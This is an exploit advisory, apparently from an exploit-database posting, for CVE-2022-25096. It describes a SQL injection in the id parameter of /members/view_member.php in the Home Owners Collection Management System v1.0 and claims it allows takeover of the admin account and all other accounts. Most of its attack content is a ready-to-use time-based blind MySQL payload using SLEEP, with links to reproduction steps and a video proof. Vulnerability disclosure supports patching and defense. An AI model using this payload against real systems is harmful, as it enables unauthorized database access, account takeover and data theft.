## Title: Owners Collection Management System v1.0 SQL - Injections
## Author: nu11secur1ty
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096
## Description:
Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.
The `id` parameter from Owners Collection Management System v1.0 appears to be vulnerable to SQL injection attacks.
The attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=0' AND (SELECT 4743 FROM (SELECT(SLEEP(5)))BjBt)-- ogKy&page=members/view_member
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096)
## Proof and Exploit:
[href](https://streamable.com/y6qdio)